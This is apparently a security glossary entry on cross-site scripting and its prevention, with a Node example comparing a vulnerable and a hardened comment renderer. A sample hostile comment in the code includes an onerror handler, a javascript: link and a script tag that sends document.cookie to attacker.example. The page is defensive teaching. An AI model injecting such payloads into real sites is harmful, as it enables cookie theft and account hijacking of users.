Security Glossary

Cross-Site Scripting (XSS) Prevention

Code Security

Cross-site scripting (XSS) is an attack in which attacker-controlled script is injected into a web page that other users view, so that it runs in their browsers with the page's origin and privileges. XSS prevention encompasses the techniques used to stop this from happening. There are three main types: stored XSS (the malicious script is saved server-side, for example in a database, and served to every user who views the affected page), reflected XSS (the script arrives in a request, typically a URL parameter, and is echoed back unencoded in the server's response), and DOM-based XSS (the page's own client-side JavaScript copies attacker-controlled data such as location.hash or a query string into a dangerous sink like innerHTML or eval, so the payload never has to pass through the server). Prevention rests on output encoding: converting characters that are special in the target context, such as angle brackets, quotes and ampersands in HTML, into harmless entities at the moment the data is rendered. The encoding must match the context, because HTML body text, attribute values, JavaScript strings and URLs each have different special characters, and entity encoding alone does not stop a javascript: URL in an href. This is backed up by a Content Security Policy header that disallows inline scripts (limiting what an injection can do if encoding is missed), by input validation where a strict format exists, and by using frameworks such as React that escape interpolated values by default; note that such defaults are bypassed by escape hatches like dangerouslySetInnerHTML. The goal is to ensure that user-supplied content is always treated as data, never as executable code.
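The following is an added example, not code from the original page or its author. It models a comment renderer as string building (which is where stored and reflected XSS bugs live), shows the vulnerable form beside the hardened one, and applies a different rule per output context: entity encoding for HTML text and attribute values, and an http(s)-only allow-list for URLs, since entity encoding would leave a javascript: href intact. The comment object, the hostile payload and the CSP value are constructed for illustration; the encoder covers the five characters the OWASP XSS Prevention Cheat Sheet lists for the HTML contexts. Runs under Node with no DOM; the same principle applies to DOM-based XSS, where the fix is to write to textContent instead of innerHTML.

```javascript
// Added example: context-aware output encoding for XSS prevention.
// Not taken from the page; sample data below is constructed.

// Entities for the HTML body and quoted-attribute contexts.
const HTML_ENTITY = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Encode untrusted data for insertion as HTML text or inside a quoted
// attribute value. Coerces to string so numbers and null do not throw.
function encodeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITY[ch]);
}

// URL context: entity encoding cannot neutralise "javascript:alert(1)",
// so only absolute http(s) URLs are allowed; anything else becomes "#".
// The parsed href is then entity-encoded because it lands in an attribute.
function safeUrl(untrusted) {
  try {
    const u = new URL(String(untrusted));
    if (u.protocol !== 'http:' && u.protocol !== 'https:') return '#';
    return encodeHtml(u.href);
  } catch {
    return '#'; // not parseable as an absolute URL
  }
}

// Vulnerable renderer: concatenates user data straight into markup. Whether
// this is stored or reflected XSS depends only on where `comment` came from.
function renderCommentVulnerable(comment) {
  return `<li><a href="${comment.site}">${comment.author}</a>: ${comment.body}</li>`;
}

// Hardened renderer: every interpolation passes through the encoder for
// its context (URL attribute, attribute/text, text).
function renderCommentSafe(comment) {
  return `<li><a href="${safeUrl(comment.site)}">${encodeHtml(comment.author)}</a>: ${encodeHtml(comment.body)}</li>`;
}

// Constructed hostile payload (not real traffic): attribute breakout with an
// event handler, an inline script tag, and a javascript: URL.
const HOSTILE_COMMENT = {
  author: '"><img src=x onerror=alert(document.cookie)>',
  body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  site: 'javascript:alert(1)',
};

// Crude detector for the demo: is there still a raw <script>/<img> tag or a
// javascript: href in the rendered output? Encoded output never matches.
function looksInjected(html) {
  return /<(script|img)\b/i.test(html) || /href="javascript:/i.test(html);
}

// Defense in depth: a CSP without 'unsafe-inline' blocks inline <script>
// blocks and inline event handlers even when an encoding step is missed.
// Illustrative value; adjust the sources for a real deployment.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

console.log('vulnerable:', renderCommentVulnerable(HOSTILE_COMMENT));
console.log('safe:      ', renderCommentSafe(HOSTILE_COMMENT));
console.log('CSP:       ', CSP_HEADER);
```

The vulnerable output contains a live `<img onerror>` and a `javascript:` link; the safe output renders the same payload as inert text. The URL rule is deliberately an allow-list rather than a blocklist of schemes, which is the check a reviewer should look for in any href or src that carries user data.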

Why It Matters

XSS is consistently among the most prevalent web application vulnerabilities, turning up in some form in a large share of the applications that security researchers and bug bounty programs test. When an attacker successfully executes JavaScript in another user's browser, they can steal session cookies and hijack the account (unless the cookie is marked HttpOnly, in which case the script can still drive the session by making authenticated requests to your API as the victim), redirect users to phishing sites, modify the content of the page (inserting fake login forms or payment dialogs), log keystrokes, and use any camera or microphone permission the user has already granted to your origin. Unlike server-side attacks, XSS targets your users directly, the people your application is supposed to protect. A single XSS vulnerability in a comment field, profile page, or search results page can compromise every user who views the affected content.

What Happens Without It

In 2005, the Samy worm exploited a stored XSS vulnerability on MySpace to create the fastest-spreading virus in history at the time. The worm added the creator as a friend and posted a message to the victim's profile, propagating itself to over one million users within 20 hours. While Samy was relatively harmless, it proved the devastating potential of XSS. In 2018, a stored XSS vulnerability in Steam's community market allowed attackers to inject scripts that could steal user session cookies and hijack accounts holding thousands of dollars in virtual items. eBay has been hit with multiple XSS vulnerabilities over the years, including one in 2017 that allowed attackers to inject scripts into product listings, potentially stealing payment credentials from buyers. More recently, XSS vulnerabilities in enterprise applications like Jira and Confluence have been used as stepping stones in targeted attacks against corporations, demonstrating that XSS impacts both consumer and business applications alike.

Every app I build includes XSS prevention by default.

or hi@mikelatimer.ai